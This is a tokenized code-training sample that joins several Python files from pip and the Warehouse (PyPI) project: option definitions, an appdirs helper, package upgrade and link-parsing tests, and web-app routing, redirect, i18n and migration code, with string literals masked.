<EOL> no_clean = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" ) <EOL> pre = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> disable_pip_version_check = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> always_unzip = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def _merge_hash ( option , opt_str , value , parser ) : <EOL> """<STR_LIT>""" <EOL> if not parser . values . hashes : <EOL> parser . values . hashes = { } <EOL> try : <EOL> algo , digest = value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> parser . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> opt_str ) <EOL> if algo not in STRONG_HASHES : <EOL> parser . error ( '<STR_LIT>' % <EOL> ( opt_str , '<STR_LIT:U+002CU+0020>' . join ( STRONG_HASHES ) ) ) <EOL> parser . values . hashes . setdefault ( algo , [ ] ) . 
append ( digest ) <EOL> hash = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> callback = _merge_hash , <EOL> type = '<STR_LIT:string>' , <EOL> help = "<STR_LIT>" <EOL> '<STR_LIT>' ) <EOL> require_hashes = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> general_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> help_ , <EOL> isolated_mode , <EOL> require_virtualenv , <EOL> verbose , <EOL> version , <EOL> quiet , <EOL> log , <EOL> no_input , <EOL> proxy , <EOL> retries , <EOL> timeout , <EOL> default_vcs , <EOL> skip_requirements_regex , <EOL> exists_action , <EOL> trusted_host , <EOL> cert , <EOL> client_cert , <EOL> cache_dir , <EOL> no_cache , <EOL> disable_pip_version_check , <EOL> ] <EOL> } <EOL> non_deprecated_index_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> index_url , <EOL> extra_index_url , <EOL> no_index , <EOL> find_links , <EOL> process_dependency_links , <EOL> ] <EOL> } <EOL> index_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : non_deprecated_index_group [ '<STR_LIT>' ] + [ <EOL> allow_external , <EOL> allow_all_external , <EOL> no_allow_external , <EOL> allow_unsafe , <EOL> no_allow_unsafe , <EOL> ] <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import os <EOL> import sys <EOL> from pip . compat import WINDOWS , expanduser <EOL> def user_cache_dir ( appname ) : <EOL> r"""<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = os . path . normpath ( _get_win_folder ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname , "<STR_LIT>" ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = expanduser ( "<STR_LIT>" ) <EOL> path = os . path . join ( path , appname ) <EOL> else : <EOL> path = os . getenv ( "<STR_LIT>" , expanduser ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname ) <EOL> return path <EOL> def user_data_dir ( appname , roaming = False ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> const = roaming and "<STR_LIT>" or "<STR_LIT>" <EOL> path = os . path . join ( os . path . normpath ( _get_win_folder ( const ) ) , appname ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = os . path . join ( <EOL> expanduser ( '<STR_LIT>' ) , <EOL> appname , <EOL> ) <EOL> else : <EOL> path = os . path . join ( <EOL> os . getenv ( '<STR_LIT>' , expanduser ( "<STR_LIT>" ) ) , <EOL> appname , <EOL> ) <EOL> return path <EOL> def user_config_dir ( appname , roaming = True ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = user_data_dir ( appname , roaming = roaming ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = user_data_dir ( appname ) <EOL> else : <EOL> path = os . getenv ( '<STR_LIT>' , expanduser ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname ) <EOL> return path <EOL> def site_config_dirs ( appname ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = os . path . normpath ( _get_win_folder ( "<STR_LIT>" ) ) <EOL> pathlist = [ os . path . join ( path , appname ) ] <EOL> elif sys . platform == '<STR_LIT>' : <EOL> pathlist = [ os . path . join ( '<STR_LIT>' , appname ) ] <EOL> else : <EOL> xdg_config_dirs = os . 
getenv ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if xdg_config_dirs : <EOL> pathlist = [ <EOL> os . path . join ( expanduser ( x ) , appname ) <EOL> for x in xdg_config_dirs . split ( os . pathsep ) <EOL> ] <EOL> else : <EOL> pathlist = [ ] <EOL> pathlist . append ( '<STR_LIT>' ) <EOL> return pathlist <EOL> def _get_win_folder_from_registry ( csidl_name ) : <EOL> """<STR_LIT>""" <EOL> import _winreg <EOL> shell_folder_name = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } [ csidl_name ] <EOL> key = _winreg . OpenKey ( <EOL> _winreg . HKEY_CURRENT_USER , <EOL> r"<STR_LIT>" <EOL> ) <EOL> directory , _type = _winreg . QueryValueEx ( key , shell_folder_name ) <EOL> return directory <EOL> def _get_win_folder_with_ctypes ( csidl_name ) : <EOL> csidl_const = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } [ csidl_name ] <EOL> buf = ctypes . create_unicode_buffer ( <NUM_LIT> ) <EOL> ctypes . windll . shell32 . SHGetFolderPathW ( None , csidl_const , None , <NUM_LIT:0> , buf ) <EOL> has_high_char = False <EOL> for c in buf : <EOL> if ord ( c ) > <NUM_LIT:255> : <EOL> has_high_char = True <EOL> break <EOL> if has_high_char : <EOL> buf2 = ctypes . create_unicode_buffer ( <NUM_LIT> ) <EOL> if ctypes . windll . kernel32 . GetShortPathNameW ( buf . value , buf2 , <NUM_LIT> ) : <EOL> buf = buf2 <EOL> return buf . value <EOL> if WINDOWS : <EOL> try : <EOL> import ctypes <EOL> _get_win_folder = _get_win_folder_with_ctypes <EOL> except ImportError : <EOL> _get_win_folder = _get_win_folder_from_registry </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> ) </s>
<s> import os <EOL> import sys <EOL> import textwrap <EOL> import pytest <EOL> from tests . lib import ( <EOL> assert_all_changes , pyversion , _create_test_package , <EOL> _change_test_package_version , <EOL> ) <EOL> from tests . lib . local_repos import local_checkout <EOL> def test_no_upgrade_unless_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert not result . files_created , ( <EOL> '<STR_LIT>' <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_to_specific_version ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_deleted <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_created <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_if_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , '<STR_LIT>' <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion not in result . files_created <EOL> ) <EOL> def test_upgrade_with_newest_already_installed ( script , data ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert not result . files_created , '<STR_LIT>' <EOL> assert '<STR_LIT>' in result . stdout , result . 
stdout <EOL> @ pytest . mark . network <EOL> def test_upgrade_force_reinstall_newest ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert result2 . files_updated , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_uninstall_before_upgrade ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result2 . files_created , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_uninstall_before_upgrade_from_url ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert result2 . files_created , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . 
venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_to_same_version_from_url ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert not result2 . files_updated , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_from_reqs_file ( script ) : <EOL> """<STR_LIT>""" <EOL> script . scratch_path . join ( "<STR_LIT>" ) . write ( textwrap . dedent ( """<STR_LIT>""" ) ) <EOL> install_result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' <EOL> ) <EOL> script . scratch_path . join ( "<STR_LIT>" ) . write ( textwrap . dedent ( """<STR_LIT>""" ) ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' <EOL> ) <EOL> uninstall_result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert_all_changes ( <EOL> install_result , <EOL> uninstall_result , <EOL> [ script . venv / '<STR_LIT>' , '<STR_LIT>' , script . scratch / '<STR_LIT>' ] , <EOL> ) <EOL> def test_uninstall_rollback ( script , data ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , list ( <EOL> result . files_created . keys ( ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , data . 
find_links , '<STR_LIT>' , '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert result2 . returncode == <NUM_LIT:1> , str ( result2 ) <EOL> assert script . run ( <EOL> '<STR_LIT>' , '<STR_LIT:-c>' , "<STR_LIT>" <EOL> ) . stdout == '<STR_LIT>' <EOL> assert_all_changes ( <EOL> result . files_after , <EOL> result2 , <EOL> [ script . venv / '<STR_LIT>' ] , <EOL> ) <EOL> @ pytest . mark . skipif <EOL> def test_editable_git_upgrade ( script ) : <EOL> """<STR_LIT>""" <EOL> version_pkg_path = _create_test_package ( script ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % ( '<STR_LIT>' + version_pkg_path ) , <EOL> ) <EOL> version = script . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in version . stdout <EOL> _change_test_package_version ( script , version_pkg_path ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % ( '<STR_LIT>' + version_pkg_path ) , <EOL> ) <EOL> version2 = script . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in version2 . stdout , ( <EOL> "<STR_LIT>" % ( version2 . stdout ) <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_should_not_install_always_from_cache ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion not in result . files_created <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_created <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_install_with_ignoreinstalled_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , '<STR_LIT>' <EOL> assert os . path . 
exists ( <EOL> script . site_packages_path / '<STR_LIT>' % pyversion <EOL> ) <EOL> assert os . path . exists ( <EOL> script . site_packages_path / '<STR_LIT>' % pyversion <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_vcs_req_with_no_dists_found ( script , tmpdir ) : <EOL> """<STR_LIT>""" <EOL> req = "<STR_LIT>" % local_checkout ( <EOL> "<STR_LIT>" , <EOL> tmpdir . join ( "<STR_LIT>" ) , <EOL> ) <EOL> script . pip ( "<STR_LIT>" , req ) <EOL> result = script . pip ( "<STR_LIT>" , "<STR_LIT>" , req ) <EOL> assert not result . returncode <EOL> @ pytest . mark . network <EOL> def test_upgrade_vcs_req_with_dist_found ( script ) : <EOL> """<STR_LIT>""" <EOL> req = ( <EOL> "<STR_LIT>" % <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> script . pip ( "<STR_LIT>" , req , expect_stderr = True ) <EOL> result = script . pip ( "<STR_LIT>" , "<STR_LIT>" , req , expect_stderr = True ) <EOL> assert "<STR_LIT>" not in result . stdout , result . stdout <EOL> class TestUpgradeDistributeToSetuptools ( object ) : <EOL> """<STR_LIT>""" <EOL> def prep_ve ( self , script , version , pip_src , distribute = False ) : <EOL> self . script = script <EOL> self . script . pip_install_local ( '<STR_LIT>' % version ) <EOL> args = [ '<STR_LIT>' , self . script . scratch_path / '<STR_LIT>' ] <EOL> if distribute : <EOL> args . insert ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> if version == "<STR_LIT>" and not distribute : <EOL> del self . script . environ [ "<STR_LIT>" ] <EOL> self . script . run ( * args ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> bindir = "<STR_LIT>" <EOL> else : <EOL> bindir = "<STR_LIT>" <EOL> self . ve_bin = self . script . scratch_path / '<STR_LIT>' / bindir <EOL> self . script . run ( self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> cwd = pip_src , <EOL> expect_stderr = True , <EOL> ) <EOL> @ pytest . mark . 
skipif ( <EOL> sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:5> ) , <EOL> reason = "<STR_LIT>" , <EOL> ) <EOL> def test_from_distribute_6_to_setuptools_7 ( <EOL> self , script , data , virtualenv ) : <EOL> self . prep_ve ( <EOL> script , '<STR_LIT>' , virtualenv . pip_source_dir , distribute = True <EOL> ) <EOL> result = self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % data . find_links , '<STR_LIT>' , '<STR_LIT>' , <EOL> expect_stderr = True if sys . version_info [ : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) else False , <EOL> ) <EOL> assert ( <EOL> "<STR_LIT>" in result . stdout <EOL> ) <EOL> result = self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT:list>' , <EOL> expect_stderr = True if sys . version_info [ : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) else False , <EOL> ) <EOL> assert "<STR_LIT>" in result . stdout <EOL> assert "<STR_LIT>" in result . stdout </s>
<s> import os . path <EOL> import pytest <EOL> from pip . download import PipSession <EOL> from pip . index import HTMLPage <EOL> from pip . index import PackageFinder , Link <EOL> def test_sort_locations_file_expand_dir ( data ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ data . find_links ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( [ data . find_links ] , expand_dir = True ) <EOL> assert files and not urls , ( <EOL> "<STR_LIT>" % <EOL> data . find_links <EOL> ) <EOL> def test_sort_locations_file_not_find_link ( data ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( [ data . index_url ( "<STR_LIT>" ) ] ) <EOL> assert urls and not files , "<STR_LIT>" <EOL> def test_sort_locations_non_existing_path ( ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( <EOL> [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> assert not urls and not files , "<STR_LIT>" <EOL> class TestLink ( object ) : <EOL> def test_splitext ( self ) : <EOL> assert ( '<STR_LIT>' , '<STR_LIT>' ) == Link ( '<STR_LIT>' ) . splitext ( ) <EOL> @ pytest . mark . parametrize ( <EOL> ( "<STR_LIT:url>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ] , <EOL> ) <EOL> def test_filename ( self , url , expected ) : <EOL> assert Link ( url ) . filename == expected <EOL> def test_no_ext ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext_fragment ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext_query ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . 
ext <EOL> def test_is_wheel ( self ) : <EOL> assert Link ( '<STR_LIT>' ) . is_wheel <EOL> def test_is_wheel_false ( self ) : <EOL> assert not Link ( '<STR_LIT>' ) . is_wheel <EOL> def test_fragments ( self ) : <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert None is Link ( url ) . subdirectory_fragment <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert '<STR_LIT>' == Link ( url ) . subdirectory_fragment <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert '<STR_LIT>' == Link ( url ) . subdirectory_fragment <EOL> @ pytest . mark . parametrize ( <EOL> ( "<STR_LIT:html>" , "<STR_LIT:url>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ] , <EOL> ) <EOL> def test_base_url ( html , url , expected ) : <EOL> assert HTMLPage ( html , url ) . base_url == expected <EOL> class MockLogger ( object ) : <EOL> def __init__ ( self ) : <EOL> self . called = False <EOL> def warning ( self , * args , ** kwargs ) : <EOL> self . called = True <EOL> @ pytest . mark . 
parametrize ( <EOL> ( "<STR_LIT:location>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ "<STR_LIT>" ] , False ) , <EOL> ( "<STR_LIT>" , [ "<STR_LIT>" ] , False ) , <EOL> ] , <EOL> ) <EOL> def test_secure_origin ( location , trusted , expected ) : <EOL> finder = PackageFinder ( [ ] , [ ] , session = [ ] , trusted_hosts = trusted ) <EOL> logger = MockLogger ( ) <EOL> finder . _validate_secure_origin ( logger , location ) <EOL> assert logger . called == expected </s>
<s> </s>
<s> import babel . dates <EOL> import email . utils <EOL> import pretend <EOL> from warehouse . i18n import filters <EOL> def test_format_date ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> format_date = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( babel . dates , "<STR_LIT>" , format_date ) <EOL> request = pretend . stub ( locale = pretend . stub ( ) ) <EOL> ctx = pretend . stub ( get = pretend . call_recorder ( lambda k : request ) ) <EOL> args = [ pretend . stub ( ) , pretend . stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_date ( ctx , * args , ** kwargs ) is formatted <EOL> kwargs . update ( { "<STR_LIT>" : request . locale } ) <EOL> assert format_date . calls == [ pretend . call ( * args , ** kwargs ) ] <EOL> def test_format_datetime ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> format_datetime = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( babel . dates , "<STR_LIT>" , format_datetime ) <EOL> request = pretend . stub ( locale = pretend . stub ( ) ) <EOL> ctx = pretend . stub ( get = pretend . call_recorder ( lambda k : request ) ) <EOL> args = [ pretend . stub ( ) , pretend . stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_datetime ( ctx , * args , ** kwargs ) is formatted <EOL> kwargs . update ( { "<STR_LIT>" : request . locale } ) <EOL> assert format_datetime . calls == [ pretend . call ( * args , ** kwargs ) ] <EOL> def test_format_rfc822_datetime ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> formatdate = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( email . utils , "<STR_LIT>" , formatdate ) <EOL> ctx = pretend . stub ( ) <EOL> timestamp = pretend . stub ( ) <EOL> args = [ pretend . stub ( timestamp = lambda : timestamp ) , pretend . 
stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_rfc822_datetime ( ctx , * args , ** kwargs ) is formatted <EOL> assert formatdate . calls == [ pretend . call ( timestamp , usegmt = True ) ] </s>
<s> import pretend <EOL> from pyramid . httpexceptions import HTTPMovedPermanently <EOL> from warehouse import redirects <EOL> def test_redirect_view ( ) : <EOL> target = "<STR_LIT>" <EOL> view = redirects . redirect_view_factory ( target ) <EOL> request = pretend . stub ( method = "<STR_LIT:GET>" , matchdict = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> resp = view ( request ) <EOL> assert isinstance ( resp , HTTPMovedPermanently ) <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_add_redirect ( monkeypatch ) : <EOL> rview = pretend . stub ( ) <EOL> rview_factory = pretend . call_recorder ( lambda target , redirect : rview ) <EOL> monkeypatch . setattr ( redirects , "<STR_LIT>" , rview_factory ) <EOL> config = pretend . stub ( <EOL> add_route = pretend . call_recorder ( lambda name , route , ** kw : None ) , <EOL> add_view = pretend . call_recorder ( lambda view , route_name : None ) , <EOL> ) <EOL> source = "<STR_LIT>" <EOL> target = "<STR_LIT>" <EOL> redirect = pretend . stub ( ) <EOL> kwargs = { <EOL> '<STR_LIT>' : redirect , <EOL> } <EOL> redirects . add_redirect ( config , source , target , ** kwargs ) <EOL> assert config . add_route . calls == [ <EOL> pretend . call ( <EOL> "<STR_LIT>" + source + str ( kwargs ) , source , ** kwargs <EOL> ) , <EOL> ] <EOL> assert config . add_view . calls == [ <EOL> pretend . call ( <EOL> rview , route_name = "<STR_LIT>" + source + str ( kwargs ) <EOL> ) , <EOL> ] <EOL> assert rview_factory . calls == [ pretend . call ( target , redirect = redirect ) ] <EOL> def test_includeme ( ) : <EOL> config = pretend . stub ( <EOL> add_directive = pretend . call_recorder ( lambda n , fn , action_wrap : None ) , <EOL> ) <EOL> redirects . includeme ( config ) <EOL> assert config . add_directive . calls == [ <EOL> pretend . call ( <EOL> "<STR_LIT>" , <EOL> redirects . add_redirect , <EOL> action_wrap = False , <EOL> ) , <EOL> ] </s>
<s> def pypi_action ( action ) : <EOL> def predicate ( info , request ) : <EOL> return action == request . params . get ( "<STR_LIT>" , None ) <EOL> return predicate <EOL> def add_pypi_action_route ( config , name , action , ** kwargs ) : <EOL> custom_predicates = kwargs . pop ( "<STR_LIT>" , [ ] ) <EOL> custom_predicates += [ pypi_action ( action ) ] <EOL> config . add_route ( <EOL> name , "<STR_LIT>" , <EOL> custom_predicates = custom_predicates , <EOL> ** kwargs <EOL> ) <EOL> def add_pypi_action_redirect ( config , action , target , ** kwargs ) : <EOL> custom_predicates = kwargs . pop ( "<STR_LIT>" , [ ] ) <EOL> custom_predicates += [ pypi_action ( action ) ] <EOL> config . add_redirect ( <EOL> "<STR_LIT>" , target , <EOL> custom_predicates = custom_predicates , <EOL> ** kwargs <EOL> ) <EOL> def includeme ( config ) : <EOL> config . add_directive ( <EOL> "<STR_LIT>" , <EOL> add_pypi_action_route , <EOL> action_wrap = False , <EOL> ) <EOL> config . add_directive ( <EOL> "<STR_LIT>" , <EOL> add_pypi_action_redirect , <EOL> action_wrap = False , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from alembic import op <EOL> revision = "<STR_LIT>" <EOL> down_revision = "<STR_LIT>" <EOL> def upgrade ( ) : <EOL> op . execute ( """<STR_LIT>""" ) <EOL> def downgrade ( ) : <EOL> op . execute ( "<STR_LIT>" ) </s>
<s> import datetime <EOL> def now ( ) : <EOL> return datetime . datetime . utcnow ( ) </s>
